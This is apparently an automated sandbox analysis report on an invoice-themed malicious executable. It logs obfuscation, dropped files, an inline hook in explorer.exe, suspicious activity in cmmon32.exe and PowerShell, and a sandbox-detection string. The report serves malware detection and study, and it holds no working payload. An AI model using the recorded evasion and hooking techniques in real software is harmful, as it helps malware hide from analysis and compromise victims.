Source: Yara match File source: 24.0.Require your Sales Ledger from 01-April-2020.exe.710000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Require your Sales Ledger from 01-April-2020.exe.500000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.Require your Sales Ledger from 01-April-2020.exe.710000.1.unpack, type: UNPACKEDPE
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Code function: 9_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 9_2_0040289F
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Code function: 0_2_0057A5EC push es; ret 0_2_0057A71A
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Code function: 0_2_04E27191 push ecx; ret 0_2_04E271A5
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Code function: 0_2_04E21B58 push esp; retf 0_2_04E21B59
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Code function: 9_2_0040B550 push eax; ret 9_2_0040B564
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Code function: 9_2_0040B550 push eax; ret 9_2_0040B58C
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Code function: 9_2_0040B50D push ecx; ret 9_2_0040B51D
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Code function: 13_2_0040B550 push eax; ret 13_2_0040B564
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Code function: 13_2_0040B550 push eax; ret 13_2_0040B58C
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Code function: 13_2_0040B50D push ecx; ret 13_2_0040B51D
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0041C023 push eax; ret 24_2_0041C029
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0041D0F2 push eax; ret 24_2_0041D0F8
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0041D0FB push eax; ret 24_2_0041D162
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0041D0A5 push eax; ret 24_2_0041D0F8
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0041D15C push eax; ret 24_2_0041D162
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_00416A81 pushfd ; ret 24_2_00416A8C
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0040B28C pushad ; ret 24_2_0040B28D
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0041CFA2 push edx; iretd 24_2_0041CFAC
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0078A5EC push es; ret 24_2_0078A71A
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0124D0D1 push ecx; ret 24_2_0124D0E4
Source: C:\Windows\explorer.exe Code function: 25_2_061CB947 pushfd ; retf 25_2_061CB945
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D1D0D1 push ecx; ret 32_2_04D1D0E4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_02B1B28C pushad ; ret 32_2_02B1B28D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_02B2DA2D push cs; iretd 32_2_02B2DA2E
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_02B2D0A5 push eax; ret 32_2_02B2D0F8
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_02B2D0F2 push eax; ret 32_2_02B2D0F8
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_02B2D0FB push eax; ret 32_2_02B2D162
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_02B2C023 push eax; ret 32_2_02B2C029
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_02B2D9C9 push ecx; retf 32_2_02B2D9CA
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_02B2D15C push eax; ret 32_2_02B2D162
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_02B2CFA2 push edx; iretd 32_2_02B2CFAC
Source: initial sample Static PE information: section name: .text entropy: 7.9825675946
Source: initial sample Static PE information: section name: .text entropy: 7.9825675946

Persistence and Installation Behavior:

barindex
Creates processes with suspicious names
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe File created: \require your sales ledger from 01-april-2020.exe
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe File created: \require your sales ledger from 01-april-2020.exe
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe File created: \require your sales ledger from 01-april-2020.exe
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe File created: \require your sales ledger from 01-april-2020.exe
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe File created: \require your sales ledger from 01-april-2020.exe Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe File created: \require your sales ledger from 01-april-2020.exe Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe File created: \require your sales ledger from 01-april-2020.exe Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe File created: \require your sales ledger from 01-april-2020.exe Jump to behavior
Drops PE files
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe File created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Jump to dropped file
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe File created: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Code function: 9_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle, 9_2_00401306

Hooking and other Techniques for Hiding and Protection:

barindex
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8C 0xCE 0xEE
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Code function: 9_2_00408E31 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 9_2_00408E31
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmmon32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmmon32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmmon32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmmon32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.314738221.0000000002951000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLLDSELECT * FROM WIN32_COMPUTERSYSTEM
